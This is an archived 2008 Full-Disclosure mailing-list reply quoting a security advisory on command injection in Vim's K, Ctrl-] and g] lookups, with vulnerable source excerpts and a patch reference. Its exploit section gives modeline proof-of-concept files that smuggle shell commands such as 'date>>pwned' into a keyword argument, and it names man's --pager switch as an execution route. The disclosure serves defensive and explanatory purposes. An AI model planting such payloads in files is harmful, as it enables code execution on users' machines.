full-disclosure-uk August 2008 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: Re: [Full-disclosure] Vim: Arbitrary Code Ex

Re: [Full-disclosure] Vim: Arbitrary Code Execution in Commands: K, Control-], g]

From: staff <staff_at_nospam>
Date: Fri Aug 22 2008 - 14:46:48 GMT
To: "Jan Min" <rdancer@rdancer.org>


You are almost as good as us when it comes to publishing bugs no one gives a shit about.

On Fri, Aug 22, 2008 at 10:25 AM, Jan Min <rdancer@rdancer.org> wrote:

> Vim: Arbitrary Code Execution in Commands: K, Control-], g]
>
> 1. SUMMARY
>
> Product : Vim -- Vi IMproved
> Versions : 3.0--current, possibly older
> Impact : Arbitrary code execution
> Wherefrom: Local
> Original : http://www.rdancer.org/vulnerablevim-K.html
>
> Insufficient sanitization can lead to Vim executing arbitrary commands
> when performing keyword or tag lookup. Ben Schmidt discovered this
> vulnerability[1].
>
>
> 2. BACKGROUND
>
> ``Vim is an almost compatible version of the UNIX editor Vi. Many new
> features have been added: multi-level undo, syntax highlighting,
> command line history, on-line help, spell checking, filename
> completion, block operations, etc.''
>
> -- Vim README.txt
>
> ``[Normal mode command] K [...] Run a program to lookup the keyword
> under the cursor. The name of the program is given with the
> 'keywordprg' (kp) option (default is "man").''
>
> -- Vim Reference Manual (``various.txt'')
>
> ``[Normal mode command] CTRL-] [...] Jump to the definition of the
> keyword under the cursor.''
>
> -- Vim Reference Manual (``tagsrch.txt'')
>
>
> 3. VULNERABILITIES
>
> ``src/normal.c'':
>
> 5514 if (cmdchar == '*')
> 5515 aux_ptr = (char_u *)(p_magic ? "/.*~[^$\\" :
> "/^$\\");
> 5516 else if (cmdchar == '#')
> 5517 aux_ptr = (char_u *)(p_magic ? "/?.*~[^$\\" :
> "/?^$\\");
> 5518 else if (cmdchar == 'K' && !kp_help)
> --> 5519 aux_ptr = (char_u *)" \t\\\"|!";
> 5520 else
> 5521 /* Don't escape spaces and Tabs in a tag with a
> backslash */
> --> 5522 aux_ptr = (char_u *)"\\|\"";
> 5523
> 5524 p = buf + STRLEN(buf);
> 5525 while (n-- > 0)
> 5526 {
> 5527 /* put a backslash before \ and some others */
> 5528 if (vim_strchr(aux_ptr, *ptr) != NULL)
> 5529 *p++ = '\\';
> 5530 #ifdef FEAT_MBYTE
> 5531 /* When current byte is a part of multibyte
> character, copy all bytes
> 5532 * of that character. */
> 5533 if (has_mbyte)
> 5534 {
> 5535 int i;
> 5536 int len = (*mb_ptr2len)(ptr) - 1;
> 5537
> 5538 for (i = 0; i < len && n >= 1; ++i, --n)
> 5539 *p++ = *ptr++;
> 5540 }
> 5541 #endif
> 5542 *p++ = *ptr++;
> 5543 }
> 5544 *p = NUL;
> 5545
> 5546 /*
> 5547 * Execute the command.
> 5548 */
> 5549 if (cmdchar == '*' || cmdchar == '#')
> 5550 {
> 5551 if (!g_cmd && (
> 5552 #ifdef FEAT_MBYTE
> 5553 has_mbyte ?
> vim_iswordp(mb_prevptr(ml_get_curline(), ptr)) :
> 5554 #endif
> 5555 vim_iswordc(ptr[-1])))
> 5556 STRCAT(buf, "\\>");
> 5557 #ifdef FEAT_CMDHIST
> 5558 /* put pattern in search history */
> 5559 add_to_history(HIST_SEARCH, buf, TRUE, NUL);
> 5560 #endif
> 5561 normal_search(cap, cmdchar == '*' ? '/' : '?', buf,
> 0);
> 5562 }
> 5563 else
> --> 5564 do_cmdline_cmd(buf);
>
> The variable ``aux_ptr'' contains characters to be escaped. Line 5519
> for the ``K'' command, line 5522 for the ``Control-]'' and ``g]''
> commands. Both values leave out characters that must be escaped. The
> command is assembled, and on line 5564, it is executed as a regular Ex
> command. No special shell escaping is done for the ``K'' command,
> although the string is passed to shell for execution.
>
>
> 3.1. Keyword Lookup -- The ``K'' Command
>
> 3.1.1. Shell Commands and Ex Commands
>
> Because the string passed to the shell for execution is not sanitized,
> it is possible to specify arbitrary shell commands where Vim expects an
> argument for the keyword program. Same applies to arbitrary Ex commands.
>
>
> 3.1.2. Keyword Program Command Line Switches
>
> It is possible to specify command line switches for the keyword program
> in place of the argument. The gravity of this vulnerability depends on
> the keyword program selected. GNU man, the default keyword program in
> many installations, supports for example the ``--pager'' option (cf.
> the GNU man(1) manual page). This allows arbitrary command execution.
>
>
> 3.2. Tag Lookup -- the ``Control-]'' and ``g]'' Commands
>
> Insufficient sanitization of an Ex command argument allows specifying
> additional arbitrary Ex commands in place of the argument.
>
>
> 3.3. Unknown Shell/Keyword Program
>
> Because the syntax of the shell that is being used to execute the
> commands is not known beforehand, there may be other unknown
> vulnerabilities, that are present depending on the shell being used.
> Ditto for the man(1) program, and other keyword programs.
>
>
> 4. EXPLOIT
>
> Copy-and-paste these examples into separate files:
>
> ;xclock
> vim: set iskeyword=;,@
>
> Place your cursor on ``xclock'', and press K. xclock appears.
>
> ;date>>pwned
> vim: set iskeyword=1-255
>
> Place your cursor on ``date'' and press K. File ``pwned'' is created in
> the current working directory.
>
> Please note: If modeline processing is disabled, set the 'iskeyword'
> option manually.
>
> See the thread on the Vim Developers' mailing list for some other
> examples[2].
>
>
> 5. PATCH
>
> A patch that fixes some of the vulnerabilities has been developed[3].
>
>
> 6. REFERENCES
>
> [1] Ben Schmidt discovered this vulnerability in:
> Message-Id: <48AB91B3.9000709@yahoo.com.au>
> http://groups.google.com/group/vim_dev/msg/6ad2d5b50a96668e
>
> [2]
> http://groups.google.com/group/vim_dev/browse_thread/thread/1434d0812b5c817e/6ad2d5b50a96668e
>
> [3] http://groups.google.com/group/vim_dev/msg/dd32ad3a84f36bb2
>
>
> 7. COPYRIGHT
>
> This advisory is Copyright 2008 Jan Minar <rdancer@rdancer.org>
>
> Copying welcome, under the Creative Commons ``Attribution-Share Alike''
> License http://creativecommons.org/licenses/by-sa/2.0/uk/
>
> Code included herein, and accompanying this advisory, may be copied
> according to the GNU General Public License version 2, or the Vim
> license. See the subdirectory ``licenses''.
>
> Various portions of the accompanying code may have been written by
> various parties. Those parties may hold copyright, and those portions
> may be copied according to their respective licenses.
>
>
> 8. HISTORY
>
> 2008-08-22 Sent to: <bugs@vim.org>, <vim-dev@vim.org>,
> <full-disclosure@lists.grok.org.uk>,
> <bugtraq@securityfocus.com>
> 2008-08-20 Ben Schmidt reported this vulnerability to <vim-dev@vim.org>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-- submit to: staff [at] lul-disclosure.net

_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/